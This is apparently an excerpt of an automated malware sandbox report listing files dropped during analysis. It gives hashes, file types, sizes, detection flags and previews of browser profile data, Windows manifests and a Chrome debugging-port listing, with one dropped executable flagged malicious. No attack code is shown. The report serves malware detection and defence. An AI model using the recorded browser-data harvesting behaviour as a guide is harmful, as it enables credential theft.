                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9571
                                                                                                                                                                                                                                                  Entropy (8bit):5.536643647658967
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                                                                  MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                                                                  SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                                                                  SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                                                                  SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2947
                                                                                                                                                                                                                                                  Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                  MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                  SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                  SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                  SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):24008
                                                                                                                                                                                                                                                  Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                  MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                  SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                  SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                  SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Joe Sandbox View:
• Filename: nB52P46OJD.exe, Detection: malicious
• Filename: lem.exe, Detection: malicious
• Filename: Setup.exe, Detection: malicious
• Filename: xoJxSAotVM.exe, Detection: malicious
• Filename: fim3BhyKXP.gif, Detection: malicious
• Filename: TMX.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: lem.exe, Detection: malicious
• Filename: ljwIPDSwFi.exe, Detection: malicious
• Filename: jE4zclRJU2.exe, Detection: malicious
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1468
                                                                                                                                                                                                                                                  Entropy (8bit):5.0065780470180306
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:p/o2e8GFp8PvMu0Vnu7vFPvJ8+FXg0Mej39ImlQu/kKcCEF4wflBX0FCUK:22e8+8PvMu0VnuRPvJ8+FXgMtImlx3cd
                                                                                                                                                                                                                                                  MD5:E68A33BDAF7AEBE6D5BBBCEFDED6AC5C
                                                                                                                                                                                                                                                  SHA1:A1120341BB4452FCA47EB5EA8FA62A08BFC48073
                                                                                                                                                                                                                                                  SHA-256:A5DC5B9F31D69E6F65F405EF4E187BAB262746AAAC08E95C195AA77A0B310DE1
                                                                                                                                                                                                                                                  SHA-512:69E1A60C0FFE8AA19B55FABE47801EEEA7CF4C84E426318D8B7BFFAF09A14FC5F569573BE30753D354B604911A616C231F485B08C3778E0A214F7E3DC9C21D2C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="artbaker".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="artbaker".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Cryptography-CryptoConfig-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration xmlns="">.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows Vista ? -->.. <detects>..
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4533
                                                                                                                                                                                                                                                  Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                  MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                  SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                  SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                  SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                  Entropy (8bit):1.3073787935088113
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrr:KooCEYhgYEL0In
                                                                                                                                                                                                                                                  MD5:762BE36507095909ED00A12FD40C1F37
                                                                                                                                                                                                                                                  SHA1:977FE1E354872CA7BE99FE44B965E8BA5895DF86
                                                                                                                                                                                                                                                  SHA-256:CBA23D793FC51AE9D7A56C00E04F344E7BA521A8978B42CAAB7F6FD62E856A0D
                                                                                                                                                                                                                                                  SHA-512:76A02AC7CAAD52C5AC211CDDFEF58FA9F596400B844FD3B52AC4D47BAB510FD2592908FAFB4FE3F47F7CB9BB577833DF1199C231F9B4387B5996D17161B341D9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3fe2931d, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                                                  Entropy (8bit):0.422192046466409
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                                                                                                                                                                                  MD5:EA74509996D8B9631510CEA39D4D9789
                                                                                                                                                                                                                                                  SHA1:0AE5D14899CAC305C7B4E4B9466728443B400374
                                                                                                                                                                                                                                                  SHA-256:87CBCE1E9B2C7F23528276183B8009543F4DE91E20AF1F3FEB4B69BFAA6DD032
                                                                                                                                                                                                                                                  SHA-512:364E67D156740ED4DC8ECBEDD12781D217E2F7AB455688123778F19BE3625A9674A073D774C75729C32FA4B93120B1DED1DF8D80216DFEE1DA8BF04406D35E84
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                  Entropy (8bit):0.07742873359674843
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:NSYeA4QpYGjjn13a/XU34+8tAllcVO/lnlZMxZNQl:IzbGj53qE34+8tAOewk
                                                                                                                                                                                                                                                  MD5:2307E217EB115FD59E5B884560D68D35
                                                                                                                                                                                                                                                  SHA1:76173431BE6145B2E5A0525F296C13F9EFD7AD2E
                                                                                                                                                                                                                                                  SHA-256:29401B1214552EE7A7A18D533C617F62C694DB81EA56E545942562930CAA5C8B
                                                                                                                                                                                                                                                  SHA-512:3B94D49505D6C8679E2FD8D047C4D41CFE76EFF7836A5472E02151BA3CF3B41841FEB25593118585F8828C304672674C16BB3FCF8185F5EDA06EE6601F0AA096
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):71954
                                                                                                                                                                                                                                                  Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                  MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                  SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                  SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                  SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                  Entropy (8bit):3.1291579496462614
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:kKJxLi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                  MD5:B2527670A2753E48BFC51AA77337F0AC
                                                                                                                                                                                                                                                  SHA1:B4C1ACE1A918A3F1D49AC8F85A8EB6252E16D32D
                                                                                                                                                                                                                                                  SHA-256:0E7AB864EEF7AB0A6E31BAACD2A38EF1DB8164E838281C1A6F4ACB33DBB47028
                                                                                                                                                                                                                                                  SHA-512:2DE5403B74A8454C3AC86CF7E4571D361217A3FD443184C5BFC8E446C6FE85DABEF08592B72038FA99CBE2C44A84A7B4BA721C24F28C9CA14C07D29C02A07A03
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:p...... ........hoT..P..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):978099
                                                                                                                                                                                                                                                  Entropy (8bit):7.973423478278547
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:pwalP8xAuX4r2UW6hFgpnzmhmwMpG/lhX1/tnn2K2:5LWjcFDtv1/tnn2K2
                                                                                                                                                                                                                                                  MD5:27B18A5E8BDAA950AF93633A821C2BFA
                                                                                                                                                                                                                                                  SHA1:5763FB49A0DCDB77959CF503F008B6F863C1E92D
                                                                                                                                                                                                                                                  SHA-256:B9C936992C244AB9864CF92BFE3365F7316B306846A4827AA91740DA78DEE813
                                                                                                                                                                                                                                                  SHA-512:EEAA5CD8FF38655B8C4C1105D05862722B660E5EB2A9C74CC08D6EB3D5678BA8803ABD3D0F6CD62B3A385017C19373DA87BF0F1093A5AEAABAC8777FA0C2A144
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                  Entropy (8bit):5.372105531384629
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoCGedFTECGNFfNaoCXIrCX2fNaoCdCmfNaoCrnE0UrU0U8CrH:6NnCRTECoNnC0CuNnCdCONnCrnE0UrUB
                                                                                                                                                                                                                                                  MD5:EC64ED4E97B42DE8FCAFD1DCF793F493
                                                                                                                                                                                                                                                  SHA1:3305792D9561C4E75CE2CBBD3B7DADEB89D4306A
                                                                                                                                                                                                                                                  SHA-256:723B64E6DCBF95F5593BB63CA034AE7BC118A2AEBDB746CA7943E392DA349C25
                                                                                                                                                                                                                                                  SHA-512:4EB061931CC1BA9D0BB3E5D75939D531610800C36B0CBD20CF7FCDFFFC672817ED2592A8AF34A89C5DA60AC36EE054ABF361DF701AEC016C62E255102B72637B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/950EF434EFE3896EA55A414B6EADF2BE",.. "id": "950EF434EFE3896EA55A414B6EADF2BE",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/950EF434EFE3896EA55A414B6EADF2BE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4DAEC0A7E81DA2CE2CEA08C9A8399714",.. "id": "4DAEC0A7E81DA2CE2CEA08C9A8399714",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4DAEC0A7E81DA2CE2CEA08C9A8399714"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):19253
                                                                                                                                                                                                                                                  Entropy (8bit):5.005753878328145
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                                                                                                                                                                                  MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                                                                                                                                                                                  SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                                                                                                                                                                                  SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                                                                                                                                                                                  SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:NlllulnmWllZ:NllUmWl
                                                                                                                                                                                                                                                  MD5:3EBBEC2F920D055DAC842B4FF84448FA
                                                                                                                                                                                                                                                  SHA1:52D2AD86C481FAED6187FC7E6655C5BD646CA663
                                                                                                                                                                                                                                                  SHA-256:32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09
                                                                                                                                                                                                                                                  SHA-512:163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:@...e................................................@..........
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1770
                                                                                                                                                                                                                                                  Entropy (8bit):5.549316294049586
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:prNtSSYERj255ScY5fIWRFQFvm57ySRKEwQXRuxZ/L0Y:1XO55W0V27mxJ
                                                                                                                                                                                                                                                  MD5:C6CD519425B9834AC8BD685288383101
                                                                                                                                                                                                                                                  SHA1:47DF09DA69492421F0EBE527C0C2BD18E37CC703
                                                                                                                                                                                                                                                  SHA-256:CE33B6577AF8130D7E2C272E1E6E80E8424E1FEF3DFD83A3C46297B32B133CA5
                                                                                                                                                                                                                                                  SHA-512:90B7DCC5903B538C8D28E995B2EE19D2C32DF549D6DBED673E3BDB8256323A1B893199F022F5189495A50158A3DF0B641B4F7FB9BA60F94DC7A5F6B1B6846E52
                                                                                                                                                                                                                                                  Malicious:true
